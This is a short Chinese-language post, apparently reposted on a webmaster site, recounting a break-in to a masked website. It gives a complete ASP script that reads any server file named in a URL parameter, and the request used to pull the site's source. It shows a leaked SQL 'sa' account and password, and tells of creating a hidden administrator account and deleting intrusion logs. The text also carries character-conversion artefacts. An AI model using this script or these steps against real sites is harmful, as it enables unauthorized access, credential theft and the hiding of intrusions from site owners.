| 攻擊目標(biāo):www.***.com 測試過的動(dòng)作,一句話馬,加密馬,等。 測試結(jié)果:無效,無法上傳,無法進(jìn)入系統(tǒng)。 經(jīng)過2天的分析, 然后自己搞出了一個(gè)代碼,利用此代碼讀取了該網(wǎng)站下的config.asp文件源代碼 ------------------------------------------------------------------------- <% file=Request("file") Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject") if FSOOBJ.fileExists(file) then Set myfile=FSOOBJ.opentextfile(file,1) Response.write " " & server.HTMLEncode(myfile.readall) &"" myfile.close Set myfile=nothing else Response.write "file(" & file & ") not exists." end if %> ------------------------------------------------------------------------- http://www.***.com/view.asp?file=D:\wwwroot\index.asp 讀取到的敏感內(nèi)容 sql地址:***.***.***.*** 帳號(hào):sa 密碼:u8f2444f 利用此帳號(hào)進(jìn)入后,建立了123$的隱藏管理員用戶,刪除入侵日志后退出。 |
免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識(shí),文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請(qǐng)勿用于商業(yè)用途,如果損害了您的權(quán)利,請(qǐng)聯(lián)系我們及時(shí)修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級(jí),為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!
掃一掃,關(guān)注站長網(wǎng)微信
大家都在看
